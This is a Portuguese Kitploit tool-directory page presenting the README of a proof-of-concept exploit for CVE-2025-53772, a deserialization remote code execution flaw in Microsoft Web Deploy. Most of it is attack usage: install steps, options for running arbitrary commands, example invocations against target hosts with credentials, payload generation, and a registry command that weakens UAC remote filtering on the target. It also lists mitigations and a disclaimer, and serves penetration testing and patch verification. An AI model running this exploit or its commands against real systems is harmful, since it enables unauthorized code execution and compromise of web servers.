Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-53772 — poc for cve-2025-53772 | Kitploit
Ferramentas/GitHubGitHub/sailay1996/cve-2025-53772
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubsailay1996/cve-2025-53772

CVE-2025-53772

poc for cve-2025-53772

Ver Repositório
4611há 8 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-53772 - Exploit de RCE no Microsoft Web Deploy

Um exploit baseado em Python para CVE-2025-53772, uma vulnerabilidade de execução remota de código no Microsoft Web Deploy (msdeploy) causada por desserialização insegura de dados de cabeçalho HTTP.

🎬 Vídeo de POC

POC


Visão Geral da Vulnerabilidade

PropriedadeValor
ID CVECVE-2025-53772
Pontuação CVSS8.8 (Alta)
Produto AfetadoMicrosoft Web Deploy 4.0
Versões Vulneráveis< 10.0.2001
Versão Corrigida10.0.2001+
Tipo de VulnerabilidadeDesserialização de Dados não Confiáveis (CWE-502)
AutenticaçãoNecessária (Privilégio Baixo)

Como Funciona

A vulnerabilidade existe na desserialização do cabeçalho HTTP MSDeploy.SyncOptions. Quando um payload especialmente criado é enviado, o servidor o desserializa usando BinaryFormatter, desencadeando a execução de código arbitrário através da cadeia de gadgets TypeConfuseDelegate.

root@kitploit:~
Attacker                                    Target Server
   │                                              │
   │  POST /MSDEPLOYAGENTSERVICE HTTP/1.1         │
   │  MSDeploy.SyncOptions: <malicious_payload>   │
   │─────────────────────────────────────────────>│
   │                                              │
   │                            BinaryFormatter.Deserialize()
   │                                     │
   │                                     ▼
   │                            Process.Start("cmd.exe", "/c ...")
   │                                     │
   │                                     ▼
   │                              RCE Achieved!

Endpoints Afetados

EndpointPortaProtocoloTipo de Autenticação
/MSDEPLOYAGENTSERVICE80HTTPNTLM
/msdeploy.axd8172HTTPSBasic

Instalação

root@kitploit:~
git clone https://github.com/sailay1996/CVE-2025-53772.git
cd CVE-2025-53772
pip install -r requirements.txt

Requisitos

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
requests-ntlm>=1.2.0

Uso

Início Rápido

root@kitploit:~
# Create proof file in C:\Windows\Temp\pwned.txt
python3 CVE-2025-53772.py -t <TARGET_IP> -u "<DOMAIN\username>" -P "<password>" --ntlm --proof-temp

CVE-2025-53772.py

Opções

root@kitploit:~
-t, --target      IP ou hostname do alvo (obrigatório)
-u, --user        Nome de usuário (obrigatório)
-P, --password    Senha (obrigatório)
--port            Porta do alvo (padrão: 80)
--endpoint        Caminho do endpoint (padrão: /MSDEPLOYAGENTSERVICE)
--ntlm            Usar autenticação NTLM (necessário para o Agent Service)
--calc            Executar calc.exe
--proof-temp      Criar C:\Windows\Temp\pwned.txt
--proof-web       Criar C:\inetpub\wwwroot\pwned.txt
-c, --command     Comando personalizado para executar
--generate-only   Apenas gerar payload, não enviar
-o, --output      Salvar payload em arquivo

Exemplos

Agent Service (Porta 80 - Autenticação NTLM)

root@kitploit:~
# Pop calculator
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\Administrator" -P "P@ssw0rd" --ntlm --calc

# Create proof file in temp folder
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\webdeploy" -P "Password123" --ntlm --proof-temp

# Create proof file in webroot (verify via browser)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm --proof-web

# Execute custom command
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm -c "whoami > C:\Windows\Temp\whoami.txt"

# Generate payload only (don't send)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "test" -P "test" --generate-only --proof-temp -o payload.txt

WMSvc Service (Porta 8172 - Autenticação Básica)

root@kitploit:~
# Using msdeploy.axd endpoint (no --ntlm flag)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "webdeploy" -P "Password123" --port 8172 --endpoint "/msdeploy.axd" --proof-temp

Verificação

Após executar o exploit, verifique a execução no alvo:

root@kitploit:~
# Check for proof file
type C:\Windows\Temp\pwned.txt

# Or via browser (if --proof-web was used)
# Navigate to: http://<TARGET>/pwned.txt

Problemas Comuns

401 Não Autorizado (NTLM)

Se estiver usando o Agent Service com NTLM e recebendo 401:

root@kitploit:~
# On target, disable UAC remote filtering:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

404 Não Encontrado (msdeploy.axd)

O manipulador IIS pode não estar registrado. Use o endpoint do Agent Service em vez disso:

root@kitploit:~
--port 80 --endpoint "/MSDEPLOYAGENTSERVICE"

Verificar Versão Vulnerável

root@kitploit:~
# Check installed version
(Get-Command msdeploy.exe).FileVersionInfo.FileVersion
# Vulnerable if < 10.0.2001

Mitigação

  1. Atualize o Web Deploy para a versão 10.0.2001 ou posterior
  2. Restrinja o acesso aos endpoints do Web Deploy via firewall
  3. Use credenciais fortes e evite reutilização de senhas
  4. Monitore logs para atividades suspeitas nas portas 80/8172
  5. Desabilite o Web Deploy se não for necessário

Referências

  • Aviso de Segurança da Microsoft
  • NVD - CVE-2025-53772
  • Pesquisa Original por HawkTrace

Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha a devida autorização antes de testar.


Licença

Licença MIT

Baixar ferramenta